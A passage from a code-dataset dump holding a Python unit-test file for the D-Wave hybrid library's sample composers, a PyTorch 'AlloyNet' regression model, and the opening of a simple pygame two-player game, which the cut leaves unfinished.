s2.samples)\n self.assertEqual(res[1].samples, s1.samples)\n\n # verify total samples energy doesn't change after ICM\n self.assertEqual(self.total_energy(inp), self.total_energy(res))\n\n def test_ising_triangle_flip(self):\n bqm = dimod.BQM.from_ising({}, {'ab': 1, 'bc': 1, 'ca': 1})\n s1 = State.from_samples({'a': -1, 'b': +1, 'c': +1}, bqm)\n s2 = State.from_samples({'a': +1, 'b': -1, 'c': +1}, bqm)\n\n icm = IsoenergeticClusterMove()\n inp = States(s1, s2)\n res = icm.run(inp).result()\n\n # Expected: ('a', 'b') identified as (the sole) cluster, selected,\n # resulting in variables {'a', 'b'} flipped. Effectively, input states\n # are simply swapped.\n self.assertEqual(res[0].samples, s2.samples)\n self.assertEqual(res[1].samples, s1.samples)\n\n # verify total samples energy doesn't change after ICM\n self.assertEqual(self.total_energy(inp), self.total_energy(res))\n\n def test_small_lattice(self):\n graph = nx.generators.lattice.grid_2d_graph(5, 5)\n bqm = dimod.generators.uniform(graph, vartype=dimod.BINARY, low=1, high=1)\n nodes = sorted(bqm.variables)\n\n s1 = State.from_samples(dict(zip(nodes, [0, 1, 0, 1, 1,\n 0, 0, 0, 1, 0,\n 0, 0, 0, 0, 1,\n 0, 0, 1, 1, 0,\n 1, 0, 1, 0, 0])), bqm)\n s2 = State.from_samples(dict(zip(nodes, [0, 1, 1, 0, 0,\n 0, 0, 0, 1, 1,\n 0, 1, 1, 0, 1,\n 0, 1, 0, 0, 0,\n 1, 0, 0, 1, 0])), bqm)\n\n exp1 = SampleSet.from_samples_bqm(dict(zip(nodes, [0, 1, 0, 1, 1,\n 0, 0, 0, 1, 0,\n 0, 1, 1, 0, 1,\n 0, 1, 0, 0, 0,\n 1, 0, 0, 1, 0])), bqm)\n exp2 = SampleSet.from_samples_bqm(dict(zip(nodes, [0, 1, 1, 0, 0,\n 0, 0, 0, 1, 1,\n 0, 0, 0, 0, 1,\n 0, 0, 1, 1, 0,\n 1, 0, 1, 0, 0])), bqm)\n\n icm = IsoenergeticClusterMove(seed=1234)\n inp = States(s1, s2)\n res = icm.run(inp).result()\n\n self.assertEqual(res[0].samples, exp1)\n self.assertEqual(res[1].samples, exp2)\n\n # verify total samples energy doesn't change after ICM\n self.assertEqual(self.total_energy(inp), self.total_energy(res))\n\n def test_bimodal_cluster_sampling_statistics(self):\n bqm = dimod.BQM.from_qubo({'ab': 1, 'bd': 1, 'dc': 1, 'ca': 1})\n nodes = sorted(bqm.variables)\n\n s1 = State.from_samples(dict(zip(nodes, [0, 1,\n 0, 0])), bqm)\n s2 = State.from_samples(dict(zip(nodes, [0, 0,\n 1, 0])), bqm)\n\n exp1 = SampleSet.from_samples_bqm(dict(zip(nodes, [0, 0,\n 0, 0])), bqm)\n exp2 = SampleSet.from_samples_bqm(dict(zip(nodes, [0, 1,\n 1, 0])), bqm)\n\n icm = IsoenergeticClusterMove(seed=None)\n inp = States(s1, s2)\n exp = [exp1, exp2]\n\n # split between [exp1, exp2] and [exp2, exp1] as output samples\n # should be ~50%\n cnt = 0\n n = 100\n for _ in range(n):\n res = icm.run(inp).result()\n r1, r2 = pluck(res, 'samples')\n\n # test responses are valid\n self.assertIn(r1, exp)\n self.assertIn(r2, exp)\n\n # verify total samples energy doesn't change after ICM\n self.assertEqual(self.total_energy(inp), self.total_energy(res))\n\n # count responses\n if r1 == exp1 and r2 == exp2:\n cnt += 1\n\n self.assertLess(cnt, 0.75 * n)\n self.assertGreater(cnt, 0.25 * n)\n\n def test_large_sparse(self):\n \"Total energy is preserved after ICM on random samples over random graph.\"\n\n # random Erdős-Rényi sparse graph with 100 nodes and 10% density\n graph = nx.generators.fast_gnp_random_graph(n=100, p=0.1)\n bqm = dimod.generators.uniform(graph=graph, vartype=dimod.SPIN)\n nodes = sorted(bqm.variables)\n\n # random input samples\n s1 = State.from_problem(bqm, samples=random_sample)\n s2 = State.from_problem(bqm, samples=random_sample)\n inp = States(s1, s2)\n\n icm = IsoenergeticClusterMove()\n res = icm.run(inp).result()\n\n self.assertAlmostEqual(self.total_energy(inp), self.total_energy(res))\n", "repo_name": "dwavesystems/dwave-hybrid", "sub_path": "tests/test_composers.py", "file_name": "test_composers.py", "file_ext": "py", "file_size_in_byte": 15995, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 78, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 19, "usage_type": "attribute"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 20, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 20, "usage_type": "attribute"}, {"api_name": "hybrid.core.State", "line_number": 26, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 28, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 28, "usage_type": "name"}, {"api_name": "hybrid.composers.IdentityComposer", "line_number": 30, "usage_type": "call"}, {"api_name": "hybrid.traits.StateTraitMissingError", "line_number": 36, "usage_type": "attribute"}, {"api_name": "hybrid.traits", "line_number": 36, "usage_type": "name"}, {"api_name": "hybrid.composers.IdentityComposer", "line_number": 37, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 37, "usage_type": "call"}, {"api_name": "hybrid.traits.StateTraitMissingError", "line_number": 38, "usage_type": "attribute"}, {"api_name": "hybrid.traits", "line_number": 38, "usage_type": "name"}, {"api_name": "hybrid.composers.IdentityComposer", "line_number": 39, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 39, "usage_type": "call"}, {"api_name": "hybrid.traits.StateTraitMissingError", "line_number": 40, "usage_type": "attribute"}, {"api_name": "hybrid.traits", "line_number": 40, "usage_type": "name"}, {"api_name": "hybrid.composers.IdentityComposer", "line_number": 41, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 41, "usage_type": "call"}, {"api_name": "hybrid.composers.IdentityComposer", "line_number": 43, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 43, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 46, "usage_type": "attribute"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 47, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 47, "usage_type": "attribute"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 50, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 50, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 59, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 59, "usage_type": "name"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 61, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 61, "usage_type": "name"}, {"api_name": "hybrid.composers.SplatComposer", "line_number": 63, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 66, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 66, "usage_type": "name"}, {"api_name": "dimod.BQM.from_ising", "line_number": 69, "usage_type": "call"}, {"api_name": "dimod.BQM", "line_number": 69, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_problem", "line_number": 70, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 70, "usage_type": "name"}, {"api_name": "hybrid.composers.SplatComposer", "line_number": 73, "usage_type": "call"}, {"api_name": "hybrid.traits.StateTraitMissingError", "line_number": 82, "usage_type": "attribute"}, {"api_name": "hybrid.traits", "line_number": 82, "usage_type": "name"}, {"api_name": "hybrid.composers.SplatComposer", "line_number": 83, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 83, "usage_type": "call"}, {"api_name": "hybrid.traits.StateTraitMissingError", "line_number": 84, "usage_type": "attribute"}, {"api_name": "hybrid.traits", "line_number": 84, "usage_type": "name"}, {"api_name": "hybrid.composers.SplatComposer", "line_number": 85, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 85, "usage_type": "call"}, {"api_name": "hybrid.composers.SplatComposer", "line_number": 88, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 88, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 90, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 90, "usage_type": "name"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 91, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 91, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 94, "usage_type": "attribute"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 97, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 97, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 98, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 98, "usage_type": "name"}, {"api_name": "hybrid.utils.min_sample", "line_number": 98, "usage_type": "call"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 99, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 99, "usage_type": "name"}, {"api_name": "hybrid.utils.max_sample", "line_number": 99, "usage_type": "call"}, {"api_name": "hybrid.composers.GreedyPathMerge", "line_number": 101, "usage_type": "call"}, {"api_name": "hybrid.core.States", "line_number": 101, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 106, "usage_type": "attribute"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 109, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 109, "usage_type": "attribute"}, {"api_name": "hybrid.core.States", "line_number": 111, "usage_type": "call"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 111, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 111, "usage_type": "name"}, {"api_name": "hybrid.composers.MergeSamples", "line_number": 113, "usage_type": "call"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 118, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 118, "usage_type": "attribute"}, {"api_name": "hybrid.core.States", "line_number": 120, "usage_type": "call"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 120, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 120, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 121, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 121, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 123, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 123, "usage_type": "name"}, {"api_name": "hybrid.composers.MergeSamples", "line_number": 125, "usage_type": "call"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 130, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 130, "usage_type": "attribute"}, {"api_name": "hybrid.core.States", "line_number": 132, "usage_type": "call"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 132, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 132, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 133, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 133, "usage_type": "name"}, {"api_name": "hybrid.core.State", "line_number": 135, "usage_type": "call"}, {"api_name": "dimod.SampleSet.from_samples_bqm", "line_number": 137, "usage_type": "call"}, {"api_name": "dimod.SampleSet", "line_number": 137, "usage_type": "attribute"}, {"api_name": "hybrid.composers.MergeSamples", "line_number": 140, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 145, "usage_type": "attribute"}, {"api_name": "dimod.BQM.from_ising", "line_number": 150, "usage_type": "call"}, {"api_name": "dimod.BQM", "line_number": 150, "usage_type": "attribute"}, {"api_name": "hybrid.core.State", "line_number": 152, "usage_type": "call"}, {"api_name": "hybrid.composers.ExplodeSamples", "line_number": 154, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 156, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet.empty", "line_number": 156, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 156, "usage_type": "name"}, {"api_name": "hybrid.composers.ExplodeSamples", "line_number": 158, "usage_type": "call"}, {"api_name": "dimod.BQM.from_ising", "line_number": 163, "usage_type": "call"}, {"api_name": "dimod.BQM", "line_number": 163, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 165, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 165, "usage_type": "name"}, {"api_name": "hybrid.core.States", "line_number": 167, "usage_type": "call"}, {"api_name": "hybrid.composers.ExplodeSamples", "line_number": 169, "usage_type": "call"}, {"api_name": "dimod.BQM.from_ising", "line_number": 176, "usage_type": "call"}, {"api_name": "dimod.BQM", "line_number": 176, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 178, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 178, "usage_type": "name"}, {"api_name": "hybrid.core.States", "line_number": 181, "usage_type": "call"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 181, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 181, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 182, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 182, "usage_type": "name"}, {"api_name": "hybrid.composers.ExplodeSamples", "line_number": 184, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 189, "usage_type": "attribute"}, {"api_name": "dimod.SampleSet.from_samples", "line_number": 193, "usage_type": "call"}, {"api_name": "dimod.SampleSet", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 193, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 193, "usage_type": "attribute"}, {"api_name": "hybrid.core.State", "line_number": 194, "usage_type": "call"}, {"api_name": "hybrid.composers.SliceSamples", "line_number": 196, "usage_type": "call"}, {"api_name": "hybrid.composers.SliceSamples", "line_number": 199, "usage_type": "call"}, {"api_name": "dimod.SampleSet.from_samples", "line_number": 204, "usage_type": "call"}, {"api_name": "dimod.SampleSet", "line_number": 204, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 204, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 204, "usage_type": "attribute"}, {"api_name": "hybrid.core.State", "line_number": 205, "usage_type": "call"}, {"api_name": "hybrid.composers.SliceSamples", "line_number": 207, "usage_type": "call"}, {"api_name": "hybrid.composers.SliceSamples", "line_number": 210, "usage_type": "call"}, {"api_name": "dimod.SampleSet.from_samples", "line_number": 215, "usage_type": "call"}, {"api_name": "dimod.SampleSet", "line_number": 215, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 215, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 215, "usage_type": "attribute"}, {"api_name": "hybrid.core.State", "line_number": 216, "usage_type": "call"}, {"api_name": "hybrid.composers.SliceSamples", "line_number": 218, "usage_type": "call"}, {"api_name": "hybrid.composers.SliceSamples", "line_number": 221, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 225, "usage_type": "attribute"}, {"api_name": "dimod.SampleSet.from_samples", "line_number": 229, "usage_type": "call"}, {"api_name": "dimod.SampleSet", "line_number": 229, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 229, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 229, "usage_type": "attribute"}, {"api_name": "hybrid.core.State", "line_number": 230, "usage_type": "call"}, {"api_name": "hybrid.composers.AggregatedSamples", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 235, "usage_type": "call"}, {"api_name": "dimod.SampleSet.from_samples", "line_number": 240, "usage_type": "call"}, {"api_name": "dimod.SampleSet", "line_number": 240, "usage_type": "attribute"}, {"api_name": "dimod.SPIN", "line_number": 241, "usage_type": "attribute"}, {"api_name": "hybrid.core.State", "line_number": 243, "usage_type": "call"}, {"api_name": "hybrid.composers.AggregatedSamples", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_equal", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 252, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_equal", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 254, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_equal", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 256, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 257, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 263, "usage_type": "attribute"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 271, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 271, "usage_type": "attribute"}, {"api_name": "dimod.BinaryQuadraticModel", "line_number": 272, "usage_type": "call"}, {"api_name": "dimod.SPIN", "line_number": 272, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 273, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 273, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_sample", "line_number": 274, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 274, "usage_type": "name"}, {"api_name": "hybrid.core.States", "line_number": 278, "usage_type": "call"}, {"api_name": "hybrid.composers.IsoenergeticClusterMove", "line_number": 279, "usage_type": "call"}, {"api_name": "hybrid.core.States", "line_number": 283, "usage_type": "call"}, {"api_name": "hybrid.composers.IsoenergeticClusterMove", "line_number": 284, "usage_type": "call"}, {"api_name": "dimod.BQM.from_qubo", "line_number": 287, "usage_type": "call"}, {"api_name": "dimod.BQM", "line_number": 287, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 288, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 288, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 289, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 289, "usage_type": "name"}, {"api_name": "hybrid.composers.IsoenergeticClusterMove", "line_number": 291, "usage_type": "call"}, {"api_name": "hybrid.core.States", "line_number": 292, "usage_type": "call"}, {"api_name": "dimod.BQM.from_ising", "line_number": 305, "usage_type": "call"}, {"api_name": "dimod.BQM", "line_number": 305, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 306, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 306, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 307, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 307, "usage_type": "name"}, {"api_name": "hybrid.composers.IsoenergeticClusterMove", "line_number": 309, "usage_type": "call"}, {"api_name": "hybrid.core.States", "line_number": 310, "usage_type": "call"}, {"api_name": "networkx.generators.lattice.grid_2d_graph", "line_number": 323, "usage_type": "call"}, {"api_name": "networkx.generators", "line_number": 323, "usage_type": "attribute"}, {"api_name": "dimod.generators.uniform", "line_number": 324, "usage_type": "call"}, {"api_name": "dimod.generators", "line_number": 324, "usage_type": "attribute"}, {"api_name": "dimod.BINARY", "line_number": 324, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 327, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 327, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 332, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 332, "usage_type": "name"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 338, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 338, "usage_type": "name"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 343, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 343, "usage_type": "name"}, {"api_name": "hybrid.composers.IsoenergeticClusterMove", "line_number": 349, "usage_type": "call"}, {"api_name": "hybrid.core.States", "line_number": 350, "usage_type": "call"}, {"api_name": "dimod.BQM.from_qubo", "line_number": 360, "usage_type": "call"}, {"api_name": "dimod.BQM", "line_number": 360, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 363, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 363, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_samples", "line_number": 365, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 365, "usage_type": "name"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 368, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 368, "usage_type": "name"}, {"api_name": "hybrid.core.SampleSet.from_samples_bqm", "line_number": 370, "usage_type": "call"}, {"api_name": "hybrid.core.SampleSet", "line_number": 370, "usage_type": "name"}, {"api_name": "hybrid.composers.IsoenergeticClusterMove", "line_number": 373, "usage_type": "call"}, {"api_name": "hybrid.core.States", "line_number": 374, "usage_type": "call"}, {"api_name": "plucky.pluck", "line_number": 383, "usage_type": "call"}, {"api_name": "networkx.generators.fast_gnp_random_graph", "line_number": 403, "usage_type": "call"}, {"api_name": "networkx.generators", "line_number": 403, "usage_type": "attribute"}, {"api_name": "dimod.generators.uniform", "line_number": 404, "usage_type": "call"}, {"api_name": "dimod.generators", "line_number": 404, "usage_type": "attribute"}, {"api_name": "dimod.SPIN", "line_number": 404, "usage_type": "attribute"}, {"api_name": "hybrid.core.State.from_problem", "line_number": 408, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 408, "usage_type": "name"}, {"api_name": "hybrid.utils.random_sample", "line_number": 408, "usage_type": "name"}, {"api_name": "hybrid.core.State.from_problem", "line_number": 409, "usage_type": "call"}, {"api_name": "hybrid.core.State", "line_number": 409, "usage_type": "name"}, {"api_name": "hybrid.utils.random_sample", "line_number": 409, "usage_type": "name"}, {"api_name": "hybrid.core.States", "line_number": 410, "usage_type": "call"}, {"api_name": "hybrid.composers.IsoenergeticClusterMove", "line_number": 412, "usage_type": "call"}]} +{"seq_id": "14805884942", "text": "import torch\r\nfrom torch import nn, optim\r\nimport torch.nn.functional as F\r\nfrom torch.utils.data import Dataset, TensorDataset, DataLoader\r\nfrom torch.utils.data import random_split\r\n\r\nclass GenData(Dataset):\r\n def __init__(self, features1, features2, labels): \r\n self.features1 = features1 \r\n self.features2 = features2\r\n self.labels = labels \r\n self.lens = len(features1) \r\n\r\n def __getitem__(self, index): \r\n return self.features1[index,:], self.features2[index,:], self.labels[index]\r\n\r\n def __len__(self): \r\n return self.lens\r\n\r\ndef split_loader(features1, features2, labels, batch_size=10, rate=0.7):\r\n data = GenData(features1, features2, labels)\r\n num_train = int(data.lens * 0.7)\r\n num_test = data.lens - num_train\r\n data_train, data_test = random_split(data, [num_train, num_test])\r\n train_loader = DataLoader(data_train, batch_size=batch_size, shuffle=True)\r\n test_loader = DataLoader(data_test, batch_size=batch_size, shuffle=False)\r\n return train_loader, test_loader\r\n\r\ndef mse_cal(data_loader, net):\r\n data = data_loader.dataset \r\n X1 = data[:][0] \r\n X2 = data[:][1]\r\n y = data[:][2] \r\n yhat = net(X1, X2)\r\n return F.mse_loss(yhat, y).detach().numpy().round(4)\r\n\r\ndef mae_cal(data_loader, net):\r\n data = data_loader.dataset \r\n X1 = data[:][0] \r\n X2 = data[:][1]\r\n y = data[:][2] \r\n yhat = net(X1, X2)\r\n mae = nn.L1Loss()\r\n return mae(yhat, y).detach().numpy().round(4)\r\n\r\nclass FCLayer(nn.Module):\r\n def __init__(self, in_dim, mid_dim, out_dim, num_fc, \r\n act_fun=nn.Softplus(), BN_model=None, momentum=0.1):\r\n super().__init__()\r\n \r\n dim_list = [in_dim, *mid_dim*np.ones(num_fc-1, dtype=int)]\r\n \r\n layers = []\r\n for i in range(len(dim_list)-1):\r\n if BN_model == None:\r\n layers.extend([nn.Linear(dim_list[i], dim_list[i+1]), act_fun]) \r\n elif BN_model == 'pre':\r\n layers.extend([nn.Linear(dim_list[i], dim_list[i+1]), \r\n nn.BatchNorm1d(dim_list[i+1], momentum=momentum), act_fun])\r\n elif BN_model == 'post':\r\n layers.extend([nn.Linear(dim_list[i], dim_list[i+1]), \r\n act_fun, nn.BatchNorm1d(dim_list[i+1], momentum=momentum)])\r\n layers.append(nn.Linear(mid_dim, out_dim)) # no act_fun in the last layer\r\n \r\n self.fc = nn.Sequential(*layers)\r\n self.fc.apply(self.init_weights)\r\n \r\n def init_weights(self, m):\r\n if isinstance(m, nn.Linear):\r\n torch.nn.init.xavier_uniform_(m.weight)\r\n m.bias.data.fill_(0)\r\n \r\n def forward(self, x):\r\n return self.fc(x)\r\n\r\nclass AlloyNet(nn.Module):\r\n def __init__(self, act_fun=nn.Softplus(), num_fc=3, BN_model=None):\r\n \r\n super().__init__()\r\n \r\n self.fc1 = FCLayer(in_dim=3, mid_dim=3, out_dim=1, num_fc=num_fc, act_fun=act_fun, BN_model=BN_model)\r\n self.fc2 = FCLayer(in_dim=3, mid_dim=3, out_dim=1, num_fc=num_fc, act_fun=act_fun, BN_model=BN_model)\r\n self.fc3 = FCLayer(in_dim=2, mid_dim=3, out_dim=1, num_fc=num_fc, act_fun=act_fun, BN_model=BN_model)\r\n \r\n self.ln1 = nn.Linear(2, 1)\r\n \r\n def forward(self, x1, x2):\r\n \r\n m = x1.reshape(x1.shape[0]*3*6, 3)\r\n m = self.fc1(m)\r\n m = m.reshape(x1.shape[0], 3, 6)\r\n m = torch.sum(m, 2)\r\n m = self.fc2(m)\r\n \r\n n = x2.reshape(x2.shape[0]*3, 2)\r\n n = self.fc3(n)\r\n n = n.reshape(x2.shape[0], 3)\r\n n = torch.sum(n, 1, keepdim=True)\r\n \r\n mn = torch.cat([m, n], 1)\r\n \r\n out = self.ln1(mn)\r\n \r\n return out\r\n\r\n", "repo_name": "jiaozihao18/AlloyNet", "sub_path": "func.py", "file_name": "func.py", "file_ext": "py", "file_size_in_byte": 4017, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 7, "usage_type": "name"}, {"api_name": "torch.utils.data.random_split", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn.functional.mse_loss", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.L1Loss", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.Softplus", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 76, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.Softplus", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "4562480612", "text": "import pygame\r\nimport random\r\nimport time\r\n\r\n#initial window setup\r\npygame.init()\r\nmax_width = 1000\r\nmax_height = 500\r\nwin = pygame.display.set_mode((max_width,max_height))\r\npygame.display.set_caption(\"Test Game\")\r\n\r\n#win counter\r\nred_counter = 0\r\nblue_counter = 0\r\n\r\n#Fonts init\r\npygame.font.init() \r\nmyfont = pygame.font.SysFont('Comic Sans MS', 30)\r\ntextsurface = myfont.render(str(red_counter) + \":\" + str(blue_counter), False, (255, 255, 255))\r\n\r\n#First Init coordinates \r\nx_red = 30\r\ny_red = 50\r\nx_blue = 950\r\ny_blue = 50\r\nwidth = 20\r\nheight = 60\r\nvel = 15\r\n\r\n#run done\r\nrun = True\r\n\r\n#player initialisation\r\nplayer_red = pygame.Rect(x_red,y_red,width,height)\r\nplayer_blue = pygame.Rect(x_blue,y_blue,width,height)\r\n\r\nwhile run:\r\n pygame.time.delay(100)\r\n\r\n for event in pygame.event.get():\r\n if 